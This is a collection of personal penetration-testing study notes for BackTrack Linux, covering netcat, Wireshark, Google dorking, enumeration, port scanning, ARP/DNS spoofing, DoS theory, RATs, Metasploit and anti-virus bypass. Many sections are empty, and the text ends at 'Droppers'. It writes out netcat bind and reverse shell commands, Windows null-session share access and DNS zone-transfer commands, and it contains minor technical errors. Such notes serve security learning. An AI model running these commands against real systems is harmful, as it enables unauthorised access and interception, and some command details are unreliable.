Vous êtes sur la page 1sur 49

Table of Contents

Introduction......................................................................................................................5
BackTrack Basics.............................................................................................................6
XWindow..............................................................................................................................................6
Set IP Through DHCP.........................................................................................................................6
Set Static IP..........................................................................................................................................6
Start SSH Service................................................................................................................................6
Start Apache Service...........................................................................................................................6
Start TFTP Service..............................................................................................................................7
Starting VNC Service..........................................................................................................................7
Checking Open Ports..........................................................................................................................7

Bash Basics........................................................................................................................7
Commands...........................................................................................................................................7
Special Characters...............................................................................................................................8
Asterisk.............................................................................................................................................8
Question Mark..................................................................................................................................8
Arrows..............................................................................................................................................9
Double Arrows..................................................................................................................................9
Pipe...................................................................................................................................................9
Grep....................................................................................................................................................10
Cut.......................................................................................................................................................10
Sort......................................................................................................................................................10
Scripting.............................................................................................................................................10

Netcat...............................................................................................................................10
Netcat Client Connection..................................................................................................................11
Netcat Server Connection.................................................................................................................11
Bind Shells..........................................................................................................................................11
Reverse Shells.....................................................................................................................................11
Netcat vs. nc.traditional....................................................................................................................12

Wireshark........................................................................................................................12
Using...................................................................................................................................................12
The TCP 3-Way Handshake (Getting a Website).......................................................................12
Filters..................................................................................................................................................12
Password Grabbing...........................................................................................................................13

Reconnaissance ..............................................................................................................13
Google.................................................................................................................................................13
Google Symbols..................................................................................................................................14
Quotes.............................................................................................................................................14
Asterisk...........................................................................................................................................14
Minus..............................................................................................................................................14
Google Operators..............................................................................................................................14
intitle...............................................................................................................................................14
inurl.................................................................................................................................................14
1

site...................................................................................................................................................15
cache...............................................................................................................................................15
Evil Google Searches.....................................................................................................................15
Google Dorks......................................................................................................................................15

Service Enumeration......................................................................................................15
Whois Enumeration..........................................................................................................................15
DNS Server Enumeration.................................................................................................................16
Host Lookup.......................................................................................................................................16
Reverse Host Lookup........................................................................................................................16
DNS Zone Transfers..........................................................................................................................16
SNMP Enumeration..........................................................................................................................17
SMTP Enumeration..........................................................................................................................17
OS Fingerprinting.............................................................................................................................17
NetBIOS Enumeration......................................................................................................................17
Active Directory Enumeration.........................................................................................................17
SMB Enumeration.............................................................................................................................18
Windows Null Sessions..................................................................................................................18
enum4linux.....................................................................................................................................18
smb-enum-users..............................................................................................................................18
smb-enum-shares............................................................................................................................18

Maltego............................................................................................................................18
Port Scanning..................................................................................................................19
Theory.................................................................................................................................................19
Types...................................................................................................................................................19
Problems.............................................................................................................................................20
Ping Assumptions...........................................................................................................................20
UDP Scans Problems......................................................................................................................20
nmap...................................................................................................................................................20
NSE.................................................................................................................................................21
zenmap................................................................................................................................................21
Unicorn Scan......................................................................................................................................21
autoscan..............................................................................................................................................21

ARP Spoofing..................................................................................................................21
Theory.................................................................................................................................................21
Limitations.........................................................................................................................................22
Ettercap..............................................................................................................................................22
DNS Spoofing.....................................................................................................................................23

OS Vulnerabilities...........................................................................................................23
Vulnerability Assessment..................................................................................................................23
Web Server Vulnerabilities...............................................................................................................24
Database Vulnerabilities...................................................................................................................24
TCP Stack Vulnerabilities.................................................................................................................24
Application Vulnerabilities...............................................................................................................25

Denial of Service.............................................................................................................25
Theory.................................................................................................................................................25
Flood Attacks.....................................................................................................................................25
2

Syn Flood........................................................................................................................................25
Mitigation for SYN Floods.............................................................................................................26
UDP Flood......................................................................................................................................26
Mitigation for UDP Floods.............................................................................................................26
ICMP Flood....................................................................................................................................26
Mitigation for ICMP Floods...........................................................................................................26
Smurf Attack...................................................................................................................................26
Mitigation for Smurf Attacks..........................................................................................................26
Ping Of Death.....................................................................................................................................26
Teardrop.............................................................................................................................................27
LOIC...................................................................................................................................................27
SSL DoS..............................................................................................................................................27

Exploits............................................................................................................................27
Compiling...........................................................................................................................................27
Resources............................................................................................................................................28

Remote Administration Tools........................................................................................28


Theory.................................................................................................................................................28
Uses.....................................................................................................................................................28
Darkcomet..........................................................................................................................................28
CyberGate..........................................................................................................................................28
Solitude ..............................................................................................................................................28
Cerberus.............................................................................................................................................28
Blackshades........................................................................................................................................28

Metasploit........................................................................................................................29
msfconsole..........................................................................................................................................29
msfcli...................................................................................................................................................29
msfweb................................................................................................................................................29
msfgui.................................................................................................................................................29
Updating Metasploit..........................................................................................................................29
Exploitation........................................................................................................................................29
Payloads..............................................................................................................................................29
Meterpreter........................................................................................................................................29
Encoders.............................................................................................................................................29
Auxiliary.............................................................................................................................................30
Credential Collection.........................................................................................................................30
db_autopwn........................................................................................................................................30
Browser Autopwn..............................................................................................................................30

Anti-virus Bypass...........................................................................................................30
Theory.................................................................................................................................................30
Droppers.............................................................................................................................................30
Theory.............................................................................................................................................30
Crypters..............................................................................................................................................30
Theory.............................................................................................................................................30
The Encrypter.................................................................................................................................31
The Stub..........................................................................................................................................31
Antis................................................................................................................................................31
3

Junk Code..........................................................................................................................................31

Buffer Overflows............................................................................................................31
Theory.................................................................................................................................................32
Protections..........................................................................................................................................32
Common Attacks...............................................................................................................................33
Problems.............................................................................................................................................33
Fuzzers................................................................................................................................................33

Web Based Attacks.........................................................................................................34


Zero Frames and Zero Images.........................................................................................................34
Command Execution.........................................................................................................................34
Cross Site Request Forgery..............................................................................................................34
File Inclusion......................................................................................................................................35
Local...............................................................................................................................................35
Remote............................................................................................................................................35
SQL Injections...................................................................................................................................35
URL................................................................................................................................................35
Authentication Bypass....................................................................................................................37
Blind...............................................................................................................................................38
SQLmap..........................................................................................................................................38
Cross Site Scripting (XSS)................................................................................................................38
Non-Persistent................................................................................................................................38
Persistent.........................................................................................................................................38

Web Based Exploitation Frameworks..........................................................................39


OWASP Mantra.................................................................................................................................39

Port Tunneling................................................................................................................39
Theory.................................................................................................................................................39
HTTP CONNECT Tunneling...........................................................................................................40
SSL Tunneling....................................................................................................................................40
stunnel.............................................................................................................................................40
SOCKS...............................................................................................................................................40
SSH Tunneling...................................................................................................................................40
Local...............................................................................................................................................40
Remote............................................................................................................................................41
Dynamic..........................................................................................................................................41

Tor....................................................................................................................................41
Theory.................................................................................................................................................41
Installing.............................................................................................................................................41
Using...................................................................................................................................................41

Authentication Vulnerabilities.......................................................................................41
Theory.................................................................................................................................................41
Problems With Networks..................................................................................................................42
Plain Text............................................................................................................................................42
Hashing Systems................................................................................................................................42
MD4................................................................................................................................................42
DES.................................................................................................................................................42
MD5................................................................................................................................................42
4

SHA1..............................................................................................................................................42
NTLM.............................................................................................................................................42
MYSQL..........................................................................................................................................42
Challenge Systems.............................................................................................................................42
Uneven Algorithms............................................................................................................................43
Here Be Dragons................................................................................................................................43

Password Attacks............................................................................................................44
Theory.................................................................................................................................................44
Strong Vs. Weak Passwords.............................................................................................................44
Brute Force.........................................................................................................................................45
Dictionary...........................................................................................................................................45
Rainbow Tables..................................................................................................................................45
GPU Cracking....................................................................................................................................45
Misconceptions...................................................................................................................................46
hydra...................................................................................................................................................47
xhydra.................................................................................................................................................47
medusa................................................................................................................................................47
ncrack.................................................................................................................................................47

Wireless Attacks..............................................................................................................47
Theory.................................................................................................................................................47
WEP....................................................................................................................................................47
WEP Cracking...................................................................................................................................48
Cafe Latte........................................................................................................................................48
ARP Replay....................................................................................................................................48
Korek's Chop Chop Attack.............................................................................................................48
Hirte Attack.....................................................................................................................................49
Fragmentation Attack......................................................................................................................49
WPA....................................................................................................................................................49
WPA Cracking...................................................................................................................................49
WPA2..................................................................................................................................................49
WPA2 Cracking.................................................................................................................................49
DoS Attacks........................................................................................................................................49
Deauthentication Attacks................................................................................................................49
Man In The Middle...........................................................................................................................49

Social Engineering..........................................................................................................49

Introduction
This resource is a collection of notes that I took over the past year relating to the subject of computer
security. This note collection will not teach you by itself. It is meant to be more of a refresher, guide,
and quick resource to help people learn.
To use this please install BackTrack. Most of the tools are already installed and will make your life a
whole lot easier.
I would also suggest brushing up on your Linux skills as they will be used heavily in this.
If you like this document, please help support the author and donate to him. The author needs to eat
5

too. If you have any questions, my contacts are as follows.


Email napalmfire.df@gmail.com
Skype napalmfiredf

BackTrack Basics
BackTrack normally starts in command line mode.
The default log-in is

User: root

Pass: toor

XWindow
To begin using BackTrack we must start the GUI.
startx

This will start KDE or GNOME depending on the version, however not all tools are GUI based, use
Konsole for all tools. The /pentest/ directory has all the tools you will need.

Set IP Through DHCP

dhcpcd [interface]

However in BT4 you must first install dhcpcd on new installations using apt-get install dhcpcd.

Set Static IP
ifconfig [interface] [ip]/24
route add default gw [gateway]
echo nameserver [gateway] > /etc/resolv.conf

Start SSH Service


Go to Start Services SSH Setup SSH
This will generate SSH keys and start service.
SSH port is 22.
service ssh start

Start Apache Service


Go to Start Services HTTPD Start HTTPD
6

HTTPD port is 80
service httpd start

Start TFTP Service


tftpd daemon port 69 /tmp/

or Start Services TFTP Start TFTP - TFTP port is 69

Starting VNC Service


vncserver

or Start Services VNC Start VNC


VNC port is 5901 (Add +1 to port for every new connection)

Checking Open Ports


netstat -ant | grep [port]

Netstat searches for open ports on host and grep filters results.

Bash Basics
BASH or the Bourne Again Shell is the terminal on which most Linux computers operate. This lets us
pass commands directly to the OS, allowing us greater control and access.

Commands
The basic structure of a command:
command argument argument argument

Here the command command is run, using argument as it's argument. A command is the program being
run, an argument is the data that the user wishes to pass to that program. Not all programs need to
receive data, some do one shot functions.
An example of a useful command:
cat emails.txt

This runs the program cat and tells it to open emails.txt.


Another thing to be wary of is switches. Switches usually have a - or -- in front. These are used to
tell the program to operate a certain way, or to denote a specific field of input.
Consider:

nmap -sV -sS 192.168.0.1

This line runs the program nmap and tells it to use the -sV and -sS functions in nmap on the IP
192.168.0.1.
Another example:
cut -d -f3 emails.txt

This would invoke the programcut and tell the program to use the -d with as an argument. It also
tells it to use -f and send 3 as an argument to -f.

Special Characters
Certain characters has special meanings in BASH and are very useful to us when dealing with large
amounts of data.

Asterisk
Asterisks are a character that replaces itself with all possible entries for a file. For instance, consider
this directory listing.

email-jodie.txt

email-sam.txt

email-unwanted.pdf

junk.txt

morejunk.txt

Lets say we want to cat all the text files with email in the name. We could go through and cat them one
by one but, that would take too long. So instead we use the asterisk to fill in all possibilities.
cat email*

While this would cat the files we did want, it will also cat email-unwanted.pdf because it was in our
range of text. Let's try again, this time limiting it only to text files.
cat email*.txt

This would cat only the files we want, ensuring no extra worthless data gets into our search.
Alternatively an even easier way to do this would to use:
cat e*.txt

This would do the same exact thing, in much less characters.

Question Mark
Similar to the asterisk, however, limited to one character.
8

Consider this directory listing:


cats1.txt
cats2.txt
cats3.txt
cats1-backup.txt
cats2-backup.txt
cats3-backup.txt

Our goal is to cat all the files that aren't backups. If we were to use the star in this situation, it would
return all the results, so we can use a question mark to search for files with only one letter from what
we need.
cat cats?.txt

Arrows
Arrows, sometimes refereed to as tacs. are used to write and read to a file from a command. For
example, lets say that you wish to save the output of a program into a file. You can use the arrow to
write that output directly to it, making your life easier.
nmap 192.168.0.1 > file.txt

Here we take the output of nmap and stuff it into file.txt, allowing us to save the results of our scan.
When doing this, if the file previously existed, it erases all the data in the file before adding the new
data.
We can also read input from files.
cut -d -f3 < ip.txt

This would send the contents of ip.txt into the cut program.

Double Arrows
Double arrows, sometimes referred to as tac-tacs, are used to add data to an already existing file.
For example, lets say you wanted to add the result of a new nmap scan to a file you already created.
nmap 192.168.0.1 > >file.txt

This would append to the file.

Pipe
The pipe is an extremely useful character and, is very useful for text manipulation, among other things.
Pipe takes the output of one program and uses it as input for another.
For example:

nmap 192.168.0.1 | grep smb

This would run nmap and then, send the output to grep to use how it pleases. This can be useful for
handling huge lines of text (which we will see later when talking about cut and sort)

Grep
Grep is a program that will search text for a specific pattern, and then output only the lines which
contain the pattern.
For instance, lets say we have a large configuration file and, we have an option that we need to find the
value of. Using grep, we can search the configuration file for that text, and have it display the result.
cat long.conf | grep hard-to-find-value

Cut
Cut is a program that is used to split text based on a delimiter. This allows us to quickly get text that
might be several characters deep.
For example, examine this set of text.
id:user:password:email
1:admin:secret:admin@admin.com

Say we only want all the usernames, we could use : as a delimiter, and specify what field we want to
get, which, in this example, would be two.
cut -d':' -f2

This will output:


user
admin

Sort
Sort allows us to sort text but, is also has a nifty feature that allows us to remove duplicates.

Scripting

Netcat
Netcat A tool used to write data directly to a TCP/UDP port. Can be in client mode or server mode.

10

Netcat Client Connection


This mode sets Netcat to client mode. This connects to a server through a port defined as an argument.
This allows the client to receive and transmit data to the server.
nc -v [ip] [port]

Netcat Server Connection


This mode sets Netcat to server mode. This allows clients to connect to that port and receive and
transmit raw data.
nc -lvvp [port]

Sending a File
nc -vv [ip] [port] < [file]

Receiving a File
nc -lvvp [port] > [file]

Bind Shells
Netcat has the ability to redirect the input and output of a console to a TCP/UDP port. This can allow
remote administration. This is called a bind shell. This then allows a server to broadcast its shell to
others.
Server
nc -lvvp [port] -e [shell]

As a note Linux's shell is located at /bin/bash/ while Windows's shell is cmd.exe.


Client
nc -v [ip] [port]

Now the shell is transmitted to the client when he connects to the server.

Reverse Shells
This works the reverse of a bind shell. This allows the client to transmit their shell to a server. This has
the same effect as the bind shell.
Server
nc -lvvp [port]

Client
nc -v [ip] [port] -e [shell]

11

Netcat vs. nc.traditional


In some linux enviroments, nc might already be installed. However, this version is different from the
actual version. To get the real version of netcat, use
apt-get install nc.traditional

you will also have to replace nc with nc.traditional in the before commands.

Wireshark
Wireshark is a packet sniffer which can capture packets and display the contents of them.

Using
wireshark &

This will put wireshark in the background of the console.


Once loaded, it is simple to use. Just select the interface you'd like to listen in on. Once in listening
mode, Wireshark will capture all incoming packets on that interface.

The TCP 3-Way Handshake (Getting a Website)


Wireshark displays packets captured by the most recent packet last. The list expands downward. Here,
we can see a sample capture of the process of making a connection and getting a webpage through
HTTP.
# Source

Destination Protocol Info

1 You

Gateway

Description

DNS

Standard query of host You ask the gateway where the host is.

2 Gateway You

DNS

Standard query
response [ip]

Gateway tells you IP Address.

3 You

Host

TCP

SYN

1st part of 3 handshake.

4 Host

You

TCP

SYN, ACK

2nd part of 3 handshake.

5 You

Host

TCP

ACK

3rd part of 3 handshake.

6 You

Host

HTTP

GET/HTTP

Beginning of sending webpage

Filters
Filters let you exclude packets based on search patterns. For instance, lets say you'd like to only see
traffic on port 1234. Filters will let you exclude anything that isn't on those ports.
tcp.port==1234

12

Filters also support Boolean logic. For instance, lets say you'd like to see port traffic on both 1234 and
4321.
tcp.port==1234 && tcp.port==4321

This will display both ports' traffic.

Password Grabbing

Reconnaissance
More info = Higher chance of success
Passive Reconnaissance Stealthily gathering information in a non-intrusive way. There is little to no
chance to being caught.
Active Reconnaissance Gathering information in a way that is intrusive and may be detected by an
IDS. There may be a medium to high risk of detection.
Look for:

Names

Numbers

Emails

Addresses

Affiliates

Links

IP addresses

Nameservers

Site Maps

Google
Google crawls a huge host of web sites, often times crawling through poorly configured webservers.
Using specific search terms we will be able to find things about webservers or, be able to increase our
attack surface, through the information we gather here.
Some examples would be:

Possible SQL injections

Possible XSS attacks

Webmail logins
13

SQL Dumps

Administration pages

Web backdoors

Misconfigured web applications

Google Symbols
Google symbols let us refine our search options, letting us quickly and efficiently get the data we need.

Quotes
search terms

Putting a term in quotes only displays pages with that sequence of text. This is opposed to no quotes
which will display all pages containing part or all of the text, regardless of sequence.

Asterisk
* birds

The asterisk will fill in all possible terms for a sequence. For instance, the asterisk here will fill in all
the different types of birds and much more, in an attempt to ind your term.

Minus
blue foot boobies -porn

The minus excludes pages with a specified terms. For example, this search excludes any pages with the
term porn in it, since Google will display all pages containing boobies.

Google Operators
Google has many operators that can help us narrow our search results. Many of them will scour pages
looking for the exact information we need, others can restrict data to certain types.

intitle
The intitle operator restricts search results to only pages that contain a pattern in the title. For example:
intitle:National Geographic Africa

The above will display result from pages that have National Geographic in then title and also have
Africa on the page. This is useful for finding admin pages, as well as file indexs.

inurl
The inurl operator lets us restrct to search terms that are in the URL of the result. Using this we can
14

often find potentially vulnerable pages or specific admin login pages.


inurl:admin.php login

site
The site operator lets us restrict results to that of a specific domain. This allows us to narrow our search
tom a specific target.
site:vulnerable.com inurl:admin.php login

cache
The cache operator lets us see the last version of a webpage crawled by Google. By using this we can
often find results of a webpage that were deleted some time ago.
cache:google.com

Evil Google Searches


I will only cover a few here, since the topic has almost endless searches. The idea of evil Google
searches is to find pages that are vulnerable, have default passwords, or find caches of information.
These searches allow an attacker to search specific websites for vulnerabilities.
For example:
Let's look for default XAMPP installs.

Google Dorks

Service Enumeration
Service Enumeration is the technique of looking for open information about a targets ISP, nameservers,
IP addresses, and running protocols.

Whois Enumeration
whois [url/ip]

Gives:

Web server admin

Numbers

Emails
15

Nameservers

DNS Server Enumeration


nslookup

Begins DNS Lookup


>[website]

Gives DNS info on specified domain


>set type=mx

Gives Mail Exchange servers


>set type=ms

Gives mail server IPs.

Host Lookup
Use this to get an IP address for a domain.
host [url]

You can also use the -t switch to specify type of server.


Look up nameservers for a specified host.
host -t ns [url]

Look up mail exchange for a specified host.


host -t mx [url]

Reverse Host Lookup


This lets you take an IP and reverse it into a domain. Using this we can often find out about the
domains IP addresses are attached to.
host [ip]

DNS Zone Transfers


DNS zone transfers are a problem existing is misconfigured DNS servers which, allow nameserver
communication. With this, an attacker can get the entirety of an external network handed to them by
just asking for a copy of the zone record.
We can perform these attacks using host. We first need a list of nameservers which, can be provided by
using nslookup.
16

host -l [victim url] [our url]

This will attempt a zone transfer to our own URL. If successful, it will give us all the IP URL matchups for us to use, exposing hidden subdomains to us.
This kind of attack might not always be successful and can be easily configured to be detected/

SNMP Enumeration
Simple Network Management Protocol is a UDP based protocol that monitors network attached
devices. Its authentication method is using public and private keys. Public keys may not have all
permissions, however, only read access is needed to enumerate. The public key is usually public.

Weak authentication system.

Vulnerable to IP-spoofing.

To begin using SNMP use the following command.


snmpwalk -c [key] -v1 [ip] 1

SMTP Enumeration
Simple Mail Transfer Protocol handles outgoing email.
Checks if user is valid.
vrfy [user]

OS Fingerprinting
OS Fingerprinting Is the process of scanning open ports and banner grabbing to detect the OS.
Once used you can figure out what exploits to use. Nmap provides free OS detection.
nmap -O [ip]

NetBIOS Enumeration
NetBIOS Network Basic Input Output System is a forgotten technology that runs by default on most
Windows computers. It provided early name resolution. This task is now more commonly handled by
DNS but, NetBIOS still runs as a default service on most Windows computers.
NBTScan Free NetBIOS scanner.

Active Directory Enumeration


Active Directory - Contains records of users, servers, sites, and workgroups.
Every account on the system has read permissions. It uses LDAP. Ldp.exe is commonly used to control
17

AD. You can possibly authenticate with a Guest or null account.


It would only take one compromise to get all the AD info.

SMB Enumeration
SMB enumeration is extremely useful as Windows runs it as a default service. We can use this to find a
list of users (Making password cracking easier), mount remote shares and, even run executables
through it.

Windows Null Sessions


A windows null session is the ability to login to a Windows computer through SMB and view info
about the computer. You do this by supplying a null user or password. Then you can mount shares from
the computer.
To use it you must use the command line in Windows.
net use \\share\ipc$ /USER:

If the command is successful the attacker can use the net view command to view information about the
computer such as users, processes , services, and uptime.
You may also be able to gain C: drive access by going to Run \\share\c$

enum4linux
enum4linux is a tool based off of a Windows tools called enum.exe. It carries many of the same
features and is extremely comprehensive in it's data.

smb-enum-users
This script lets us enumerate the users on a remote Windows computer. This script is very similar to
enum.exe for Windows.
nmap -sS -sU --script smb-enum-users.nse -p U:127 T:139,445 [host]

WARNING! This script has two options lsaonly and samronly. samronly REQUIRES a real user
account, not just guest. lsaonly requires only a guest account.

smb-enum-shares
This script lets us enumerate the shares of a remote windows computer.

Maltego

18

Port Scanning
Theory
Port Scanning - The technique of scanning for open ports to ascertain information about a target
computer. It is the first action to take before attempting exploit. It is part of the information gathering
phase. Can be intrusive and detected by an IDS
Packets Information sent over the network in smaller chunks. Uses flags to indicate the type of
packet. Flags can be mixed.

Types
Type

Meaning

Syn

Initial Packet(Begin handshake)

Ack

Acknowledgment(Reply for packet received)

Fin

Finish(Done with connection)

Urg

Urgent

Psh

Push

Rst

Reset(Sent to reset the TCP handshake)

TCP - Port that uses a 3-way handshake to identify open ports and begin data transfers.
UDP - A port that uses a stateless system. If the port is open there is no reply. If it is closed you get an
ICMP ping.
Full Scan - Completes 3-way handshake. Is intrusive and easily detected but, reliable.
Half Scan/SYN Scan Sends only syn packets and does not complete the handshake. This makes it
harder to detect.
UDP Scan Scans UDP ports. However it is unreliable because UDP is stateless. If the port is up there
is no reply. If it is down source receives an ICMP unreachable.
Stealth Scan Uses same method as syn scan but varies the frequency and timing and randomizes the
ports scanned making it harder to detect.
Xmas Scan Creates a malformed packet with PSH, FIN, and URG flags to scan a system. Doesn't
work against Windows.
Ack Scan Scanner sends ACK packets and receives a RST packet back. This shows the attacker
which ports are open.
ICMP Scan Very detectable ping scan. Rarely used because it is unreliable, inefficient ,and
19

detectable.

Problems
Port scans often times are noisy and dangerous, doing one can make you an easy target for an IDS or
firewall logging system.

Ping Assumptions
In most cases, unless told not to, scanners will attempt to ping the host before attempting a port scan. If
it doesn't get a ping back the host is considered as not alive. This I a false assumption in some cases
and can provide faulty scan results, telling you that computers are not alive that actually are and are just
not responding to ping probes.

UDP Scans Problems


Since UDP scans are stateless, there can be issues with the detection process. For example, a firewall
can be blocking probes to certain ports and, you'll never know.
It could also allow the data through but, not kill the ICMP Unreachable packet on its way out.
As a result, take UDP scans with a grain of salt, chances are, you aren't seeing the full picture.

nmap
Nmap runs a port scan on the specified IP.
nmap -p [port] [ip]

Full port scan.

nmap -p 1-65535 [ip]

OS detection

nmap -O [ip]

Service versions scan

nmap -sV [ip]

Comprehensive scan
nmap -A [ip]

20

NSE
The nmap Scripting Engine is a tool which allows us to write and use scripts to aid us in our
penetration testing goals. We used a script ealier in the SMB Enumeration section to attempt an
enumeration of users on a system.
We can see the various .nse scripts included with nmap on their site, and we can also see them by going
through the nmap scripts directory.
We can also attempt to use all scripts using this command:
nmap --scripts all [ip]

zenmap
Zenmap is a nmap gui that will allow use to easily understand the sometimes overflow of data that
nmap can provide.

Unicorn Scan
A scanning tool like nmap but, has a web GUI. (See Appendix for list of features)

unicornscan [ip]

autoscan

ARP Spoofing
Theory
ARP - A protocol for finding a MAC address for a host whose IP is known. It consists of a Broadcast
request phase, and a reply phase, and a conformation phase.
ARP cache - The table containing MAC-IP match ups.
ARP Spoofing(APR) - The technique used to poison ARP caches. A sniffer get ARP packets from a
switch and proceeds to intercept them. Then it can route all network traffic to the attacker.
1. Host-A broadcasts on all ports . ARP Request
2. Host-B receives request and sends back reply. ARP Reply
3. Host-A sends conformation to Host-B
By listening in a sniffer could get all the MAC-IP match-ups on the network. by using this data we can
reroute packets through our machine and then out to the destination.
It does this by actively listening then modifying standard ARP packets.

21

Victim Packet
Source
Destination

MAC

IP

Attacker

Gateway

Victim

Victim

Gateway Packet
Source

Attacker

Victim

Destination

Gateway

Gateway

Limitations
Once in the attack stage, the attacker must reroute all traffic to the appropriate destinations while still
poisoning the ARP cache. There are 5 rules about APR attacks.
1. APR only works on LANs.
2. Attacker must reroute packets unless a DoS attack is preferred.
3. Attacker must know where to reroute packets.
4. APR will slow down the network as you are adding another layer to the network.
5. APR must update constantly. If not, the computer will delete the entries if it ARP requests an
address again.
6. An APR attack can not be done to computers connected to the main router themselves. This is
because the router is able to intercept them before damage is done.
Also, APR attacks need to have some thought put into them.
1. One peer may be the Internet. If this is true you need to have the routing tables or be
broadcasting.
2. There could be multiple entrance/exits on a LAN
3. There may be anti-APR protections.

Ettercap
Ettercap - A tool used for ARP spoofing.
Get hosts on a network

Hosts -> Scan for hosts

See list of Hosts

Hosts -> Hosts lists

Target 1 = Gateway

22

Target 2 = Victim

MITM->ARP Poisoning to begin APR.

DNS Spoofing
DNS Spoofing The tactic of making a malicious zone transfer to make a false IP-URL match-up.
This is done to send a target to a malicious website or DoS. EX: Google.com = attackers IP
1. Run ettercap with a unified sniffer
2. Turn on DNS spoof plugin
3. APR
4. Start sniffer

OS Vulnerabilities
All OS have all vulnerabilities. It is a common misconception that Windows is the only OS with holes.
Exploit A malicious piece of code which can compromise a systems security and give an attacker
access to that computer. They are used to penetrate and ultimately gain access to a system. They have a
broad range of payloads and can do just about anything.
Common vulnerabilities

Application Vulnerabilities

TCP Stack Overflows

Default permissions

Default security settings

The most popular, successful, and common attacks are in default services, software, or processes that
run on the computer. This is because the software is preinstalled and usually running by default.
However, there are holes in all software and they can be taken advantage of.

Vulnerability Assessment
Vulnerabilities are security flaws in software. The are caused by poorly written code and a lack of
testing. Patches fix holes. Unpatched systems are more vulnerable so you should always update all
software.
Vulnerability scanners

Nessus

Nikito

Security Websites

Bugtraq

CVE Sites
23

Milw0rm

exploit-db

Web Server Vulnerabilities


Web servers are extremely vulnerable because of many reasons.

Permanent connection to Internet

Most likely firewalled

Easier to exploit due to poor security.

Common vulnerabilities

Passwords stored in plain-text or code

Ability to traverse directories without getting 503.

Ability to execute scripts

Ability to bypass URL Checking and return a command prompt

Improperly patched and configured servers.

Database Vulnerabilities
All DB systems have holes. Database servers may be local or remote. Might be behind a fire wall or
DMZ.
Common vulnerabilities

Misconfigured permissions

bad database objects

SQL injection

Default DB passwords

Null accounts/null sa account

Vulnerable to the application they serve

If application is poorly written it can allow for a compromise

TCP Stack Vulnerabilities


All OSs have this vulnerability. It is usually exploited for DoS attacks. It can be used to get in deeper
into a network.
Common Vulnerabilities

TCP Sequence Prediction (Session jacking)


24

TCP Window Size Overflow

Syn Flood

APR

DNS Poisoning (DNS Zone Transfers)

High Volume Attacks (Ping of Death, Smurf, Teardrop, Botnets)

Smurf Pinging a system with a broadcast address to get the target to send DoS other computers.
Teardrop Sending malformed packets with bad IP fragments which causes an overflow on the TCP
stack and cause a DoS.

Application Vulnerabilities
These vulnerabilities affect almost all software. They usually stem from poor coding practices.
Common Vulnerabilities

Buffer Overflows

Weak Authentication

Poor Data Validation

Written with errors/poor error checking

Denial of Service
Theory
The idea is to force a victim to use so much RAM that the computer slows to a halt, crashes, and goes
offline. DoS attacks have become very mainstream as they often require little technical knowledge and
tools are widely available.

Flood Attacks
Flood attacks are a form of DoS attack that attempts to bring a system down by flooding it with
connections. This works because for every connection one makes, the computer must open up a slot in
RAM for the connection. As a result, the computer can become bogged down until it crashes or, stops
serving new connections.

Syn Flood
This abuses an issue in the TCP 3-way handshake, that can be exploited by an attacker to down a
service. This happens when an attacker(s) sends many SYN requests to a server but, never replies to
them. The server will wait until a time-out on the connection is reached, keeping a slot of RAM
occupied for a specified amount of time. The attacker(s) must open enough slots in memory before
25

their requests start timing out or, the attack will fail.

Mitigation for SYN Floods


The best way to deal with SYN floods is SYN cookies. SYN cookies work by sending the appropriate
SYN/ACK response but, discards the SYN packet it received, ensuring SYN floods fail. This is
because SYN floods rely on servers keeping the SYN packet for a specified period of time, so they can
fill up the queue.
Firewalls can also easily detect flood attacks as, most have built in rules about the maximum
connections one address is allowed to have.

UDP Flood
This abuses a flaw in UDP statless connections where, when no service is listening on a port, it replies
with a ICMP unreachable. As a result, an attacker must only send large a large number of UDP packets
to different ports that are closed. As a result, the server will respond with a large number of ICMP
packets, causing the system to eventually become offline.

Mitigation for UDP Floods


Firewalls should be installed to filter out non-open ports, causing the UDP flood to fail as the UDP
packets never reach the intended host.

ICMP Flood
This attack involves sending massive amounts of ping packets to a host, forcing a reply. The idea is
similar to the previous flood attacks as, the system must open a slot of RAM to deal with the ping.

Mitigation for ICMP Floods


ICMP floods are easily stopped by firewalls. Most firewalls have automatic ICMP flood detection
systems built in.

Smurf Attack
Smurf attacks involve spoofing source IP address to get a system to flood another system. The system
who receives the spoofed packet believes the supplied source address is the one that sent it. As a result,
this causes the system to respond to the source address. If spammed with said spoofed packet the server
will, in turn, spam the victim.

Mitigation for Smurf Attacks


Simple firewall rules should stop this kind of attack.

Ping Of Death
This attack involves sending malformed ping packets in an attempt to cause a crash on the victim. The
26

crash can be either the TCP stack or the system itself.


These attacks don't work much any more. They only tend to work on much older systems.

Teardrop
This attack involves sending mangled IP fragments in an attempt to cause a crash on the system. These
attacks don't work much either.
However, the last documented case was in 2009 and for Windows Vista and 7. It had to do with SMB
not handling IP fragments properly.

LOIC
Low Orbit Ion Cannon or LOIC is a popular tool for flood attacks. This tool has the ability to send
TCP, UDP and ICMP floods at a specified host.
LOIC has been used heavily by the group Anonymous, and has helped down many unsavory sites like
RIAA and MPAA.

SSL DoS
This attack has been known about since 2003 and is a flaw regarding SSL's renegotiation feature. This
allows an attacker to down a server completely from just one connection rather than many like in
traditional flood attacks.
The hack was first made public by the THC Team.

Exploits
Exploit - A malicious piece of code meant to compromise a system.

Compiling
Some exploits need to be compiled before use. This is because one exploit might not fit every system.
You usually must edit the code and then compile it.
For C and C++ you must use the gcc compiler.
gcc -o <app> <file>

This will compile the code under the application name <app>.
For python, Perl, Ruby, and other scripting languages.
chmod +x <file>

To find useful exploits cat and grep /pentest/exploits/exploitdb/files.csv


Warning! Some exploits may be unreliable.

27

Resources
Exploit code site

milw0rm.com Down

exploit-db.com

Remote Administration Tools


Theory
Remote Administration Tools or RATs allow an attacker to take complete control of a remote computer,
often allowing them to spy and infect other users on a network. The goal of these tools is to make it
easy for an attacker to administrate many bots, and also, formulate attacks against other targets using
these bots.

Uses
Many free and commercial RATs are available for download. They often allow an attacker to keylog,
steal passwords, perform flood attacks, and even remotely view the users screen and webcam. Attacker
often route their internet connections through infected hosts when attacking servers to ensure
anonymity.

Darkcomet

CyberGate

Solitude

Cerberus

Blackshades

28

Metasploit
Metasploit is a open source exploitation framework used to simply and easily write exploit code for
applications. It is written in Ruby and extremely powerful. It has many great features which make it a
great addition to any pen-testers library

msfconsole
This program opens an interactive console for Metasploit.
msfconsole

This lets us pass commands to Metasploit in an interactive environment.


From here we can type commands directly to MSF.

msfcli

msfweb

msfgui

Updating Metasploit

Exploitation

Payloads

Meterpreter

Encoders

29

Auxiliary

Credential Collection

db_autopwn

Browser Autopwn

Anti-virus Bypass
Theory
Anti-virus bypassing is any sort of program that attempts to bypass and ant-virus to get a malicious
program on a machine. This often times is done by using code obscurification techniques to hide the
malicious code.

Droppers
